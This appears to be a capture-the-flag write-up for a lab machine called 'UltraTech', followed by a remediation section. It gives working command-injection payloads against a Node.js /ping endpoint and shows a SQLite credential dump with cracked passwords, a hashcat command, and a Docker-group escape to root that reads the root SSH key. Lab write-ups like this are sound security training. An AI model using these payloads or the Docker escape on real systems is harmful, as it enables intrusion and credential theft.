Target IP: 10.10.x.x (UltraTech)
Difficulty: Medium
Objective: User (r00t) & Root (root.txt / SSH Key)
1. Executive Summary
“UltraTech” is a Linux machine exposing a Node.js API and a standard Apache web server on non-standard ports. Initial access is achieved by discovering a Command Injection vulnerability in the API’s /ping endpoint. Instead of a traditional reverse shell, we exfiltrate the internal SQLite database to recover hashed credentials. Privilege escalation is achieved by abusing the user’s membership in the Docker group, allowing us to mount the host filesystem and access root artifacts.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Discovering high ports (8081, 31331).
- T1059.004 (Command and Scripting Interpreter): Node.js Command Injection.
- T1552 (Unsecured Credentials): Dumping SQLite database for hashes.
- T1110 (Brute Force): Cracking MD5 hashes.
- T1611 (Escape to Host): Abusing the Docker group to mount the host filesystem.
2. Enumeration
A. Network Scanning
We start with a full port scan, as standard ports didn’t reveal the full picture.
nmap -sS -p- --min-rate 5000 -oN nmap/all 10.10.x.xKey Findings:
- 21/tcp (FTP): vsftpd 3.0.3.
- 22/tcp (SSH): OpenSSH 7.6p1.
- 8081/tcp (HTTP): Node.js Express API (The “Blackice” banner is a red herring or default).
- 31331/tcp (HTTP): Apache Web Server.
B. Web Enumeration (Port 31331)
Browsing http://10.10.x.x:31331 reveals the main “UltraTech” website.
- Sitemap:
/utech_sitemap.txtreveals/partners.html. - API Discovery: The login page or
partners.htmlmakes JavaScript requests to port 8081.
C. API Enumeration (Port 8081)
Fuzzing this port or analyzing the JavaScript source reveals two key endpoints:
/auth: Handles login./ping: Takes anipparameter.
Vulnerability Check:
Accessing /ping without parameters throws a generic error, leaking the server path (/home/www/api/index.js), confirming it is a Node.js Express application.
3. Initial Access: The Command Injection
A. The Vulnerability
The /ping endpoint likely passes the ip parameter to a system shell command (like ping <ip>). We can inject our own commands using backticks ``` or shell operators (|, ;).
Test Payload:
http://10.10.x.x:8081/ping?ip=`id`Response: uid=1001(www) ...
Conclusion: We have Remote Code Execution (RCE).
B. Data Exfiltration (The Database)
While a reverse shell is possible (using python3 or nc), you opted for a cleaner approach: Data Exfiltration.
We list the files in the current directory:
/ping?ip=`ls`Result: utech.db.sqlite
We dump the database contents directly to the browser:
/ping?ip=`cat utech.db.sqlite`C. Cracking Credentials
The database dump reveals two users and their hashes:
- r00t:
f357a0c52799563c7c7b76c1e7543a32-> n100906 - admin:
0d0ea5111e3c1def594c1684e3b9be84-> mrsheafy
Tool: Hashcat or CrackStation.
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txtD. SSH Login
ssh r00t@10.10.x.x
# Password: n100906Status: User r00t.
4. Privilege Escalation: Docker Group Abuse
A. Enumeration
We check our current privileges.
id
# uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)Critical Finding: We are in the docker group.
B. The Vulnerability
The docker group grants the user the ability to communicate with the Docker Daemon socket. This is effectively Root access. We can spin up a container and mount the host’s root filesystem (/) into the container, bypassing all host file permissions.
C. The Exploit
We execute the standard GTFOBins Docker escape:
docker run -v /:/mnt --rm -it bash chroot /mnt shBreakdown:
-v /:/mnt: Mount the Host’s/directory to the Container’s/mntdirectory.--rm: Clean up the container after exit.-it: Interactive TTY.bash: The image to run (or alpine).chroot /mnt sh: Change the root directory of the current process to/mnt(which is the Host’s real root) and spawn a shell.
Result: We are now effectively root on the host filesystem.
# whoami
root
# cat /root/.ssh/id_rsaRoot Flag: Found in /root/root.txt (or extracting the SSH key to log in properly).
5. Remediation (Blue Team)
- Input Sanitization: The
/pingendpoint must validate that theipinput matches a specific format (e.g., IPv4 Regex) and should not pass user input directly toexec()orsystem()functions. Use language-specific libraries (e.g.,child_process.execFile) that separate arguments from the command. - Docker Security:
- Do not add standard users to the
dockergroup. It is functionally equivalent to giving them genericsudoaccess without a password. - Use Rootless Docker to limit the impact of a compromised container or daemon interaction.
- Port Security: Restrict access to internal API ports (8081) using a firewall (UFW/iptables) or bind them to
localhostif they are only meant to be accessed by the frontend server.